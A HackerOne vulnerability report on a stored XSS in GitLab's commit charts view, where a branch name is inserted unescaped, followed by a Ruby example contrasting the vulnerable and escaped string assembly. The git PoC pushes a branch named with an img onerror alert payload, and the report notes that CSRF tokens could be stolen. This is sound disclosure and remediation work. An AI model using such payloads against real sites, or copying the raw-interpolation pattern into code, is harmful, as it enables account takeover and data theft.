Stored XSS in Graph/Charts due to unescaped Branch-name
Link: https://hackerone.com/reports/341685
By: @fransrosen
Details: Hi,
When a branch is named with an HTML element including JavaScript, the Chart view located at:
/frans/*REPO*/graphs/*BRANCH*/charts
is not sanitizing the branch name properly:
<h4>
Commit statistics for <strong><img/src='x'onerror=alert(1)></strong> Dec 22
- Jan 09
</h4>
I'm running:
GitLab Community Edition 10.6.4 dee2c87
but also verified the issue is in master:
https://gitlab.com/gitlab-org/gitlab-ce/commit/9f49329cbb09faa17fd29e959828e487267e65c2
- start_time = capture do
  #{@commits_graph.start_date.strftime('%b %d')}
- end_time = capture do
  #{@commits_graph.end_date.strftime('%b %d')}
-# @ref (the branch name) is interpolated raw into the <strong> markup and the
-# whole formatted string is then marked html_safe, so it is never escaped.
= (_("Commit statistics for %{ref} %{start_time} - %{end_time}") % { ref: "<strong>#{@ref}</strong>", start_time: start_time, end_time: end_time }).html_safe
This seems to have been introduced on the 8th of Feb this year due to localization changes.
PoC
First, clone an existing project:
git clone https://gitlab/test/xxx.git .
Then add a new branch and commit to it:
git checkout -b "<img/src='x'onerror=alert(document.domain)>"
mv x y
git add .
git commit -m "test"
git push --set-upstream origin "<img/src='x'onerror=alert(document.domain)>"
Then by going to the Charts-section under Repository and selecting the new branch, the XSS will run (In Chrome, the XSS-auditor will trigger since the payload is in the URL, but Firefox should show it running)
Impact
The stored XSS is triggering for anyone, also triggering on gitlab.com, and it can trigger on public repos. It will not bypass the XSS-auditor as far as I can see, but there might be bypasses I do not know of. You could easily build a PoC that would modify the email address of the current user stealing their CSRF-token as soon as the script triggers, or stealing information about private repositories.
Regards, Frans
The hacker selected the Cross-site Scripting (XSS) - Stored weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:
URL http://gitlab-instance.localhost/frans/REPO/graphs/BRANCH/charts
Verified Yes
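As an added example, not part of the report and not GitLab's code, the following Ruby reproduces the string assembly from the Haml view quoted above outside Rails, beside the escaped form a fix would use. The function names (heading_vulnerable, heading_hardened, leaks_markup?) and the sample inputs are constructed for this illustration; ERB::Util.html_escape is Ruby stdlib, and Rails' html_safe marker is not modelled, so the point shown is only where escaping happens relative to the concatenation.

```ruby
# Added example (not GitLab's code): reproduces the unsafe string assembly
# from the Haml view in this report and shows the hardened variant.
# ERB::Util.html_escape is stdlib; `.html_safe` is a Rails/ActiveSupport
# concept not modelled here, so "safe" below simply means "escaped".
require 'erb'

# Constructed sample inputs: the branch name from the PoC, plus the
# pre-rendered date fragments that the view produces with strftime.
PAYLOAD_REF = "<img/src='x'onerror=alert(document.domain)>"
START_TIME  = 'Dec 22'
END_TIME    = 'Jan 09'

# gettext-style template, as in the view after the localization change.
TEMPLATE = 'Commit statistics for %{ref} %{start_time} - %{end_time}'

# Vulnerable variant: the raw branch name is spliced into HTML and the
# whole result is afterwards treated as trusted markup (html_safe in the view).
def heading_vulnerable(ref, start_time, end_time)
  TEMPLATE % { ref: "<strong>#{ref}</strong>", start_time: start_time, end_time: end_time }
end

# Hardened variant: escape the attacker-controlled value *before* it is
# concatenated with markup, so a later html_safe covers only our own tags.
def heading_hardened(ref, start_time, end_time)
  safe_ref = ERB::Util.html_escape(ref)
  TEMPLATE % { ref: "<strong>#{safe_ref}</strong>", start_time: start_time, end_time: end_time }
end

# Review/test helper: after removing the <strong> wrapper we add ourselves,
# does the heading still contain the start of an unescaped tag?
def leaks_markup?(html)
  html.gsub(%r{</?strong>}, '').match?(%r{<[a-zA-Z!/]})
end

if __FILE__ == $PROGRAM_NAME
  puts heading_vulnerable(PAYLOAD_REF, START_TIME, END_TIME)
  puts heading_hardened(PAYLOAD_REF, START_TIME, END_TIME)
end
```

Inside a Rails view the same ordering applies: escape @ref (for example with html_escape, or build the <strong> with content_tag, which escapes its content) before the formatted string is marked html_safe, rather than marking the whole concatenation safe.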